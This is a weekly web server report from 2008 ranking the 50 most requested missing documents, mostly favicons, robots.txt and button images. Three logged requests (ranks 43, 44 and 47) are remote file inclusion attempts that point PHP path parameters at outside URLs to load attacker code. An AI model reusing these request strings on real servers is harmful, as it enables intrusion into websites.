Week of 10/26/2008 to 11/1/2008: Top 50 of 3,242 Documents Not Found

Sorted by Access Count

Rank Document Accesses %
1 /cards/cgi-bin/card.cgi [Referrers] 2,685 25.16
2 /favicon.ico [Referrers] 1,403 13.15
3 /robots.txt [Referrers] 1,288 12.07
4 /hontoon/photoback1.gif [Referrers] 145 1.36
5 /deleonsprings/www.planetdeland.com/sugarmill/index.htm 40 0.37
6 /delandsign.htm [Referrers] 34 0.32
7 /hontoon/welcomepage.htm [Referrers] 29 0.27
8 /favicon.gif 21 0.20
9 /candycastle/bindex.htm.htm [Referrers] 19 0.18
10 /btn-c2.gif 15 0.14
11 /btn-b2.gif 15 0.14
12 /mushin-dojo/images/howwepractice.htm_cmp_network010_vbtn_p.gif [Referrers] 15 0.14
13 /btn-new.gif 15 0.14
14 /deleonspringsstatepark/index.htm [Referrers] 15 0.14
15 /btn-a2.gif 15 0.14
16 /btn-d2.gif 15 0.14
17 /btn-e2.gif 15 0.14
18 /btn-f2.gif 15 0.14
19 /btn-g2.gif 15 0.14
20 /btn-i2.gif 15 0.14
21 /mushin-dojo/images/seminarsandevents.htm_cmp_network010_vbtn_p.gif [Referrers] 15 0.14
22 /btn-j2.gif 15 0.14
23 /btn-k2.gif 15 0.14
24 /btn-l2.gif 15 0.14
25 /btn-o2.gif 14 0.13
26 /btn-r2.gif 14 0.13
27 /btn-s2.gif 14 0.13
28 /btn-p2.gif 14 0.13
29 /btn-t2.gif 14 0.13
30 /btn-u2.gif 14 0.13
31 /btn-v2.gif 14 0.13
32 /btn-w2.gif 14 0.13
33 /realaudio/indiscretion.ram 14 0.13
34 /btn-q2.gif 14 0.13
35 /btn-x2.gif 14 0.13
36 /btn-z2.gif 14 0.13
37 /btn-y2.gif 14 0.13
38 /btn-m2.gif 14 0.13
39 /btn-n2.gif 14 0.13
40 /christos/freeplayer_g2.gif [Referrers] 13 0.12
41 /tjs 13 0.12
42 /cbcbcircus/main.htm 13 0.12
43 //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.konkurent.ru/poll/paddy?? [Referrers] 13 0.12
44 //tiny_includes/config.php?dir_ws=http://www.annunciora.it/images/prc.gif? 12 0.11
45 /firstbaptist/index.htm [Referrers] 11 0.10
46 /bri-terhomerepair/index.htmrobots.txt 11 0.10
47 //appserv/main.php?appserv_root=http://www.parkliv.nu/mambots/ /.t/id.txt?? [Referrers] 11 0.10
48 /downtown/bluemartinideland.com 10 0.09
49 /cards/images/back1.gif [Referrers] 10 0.09
50 /motospeedtech/ [Referrers] 10 0.09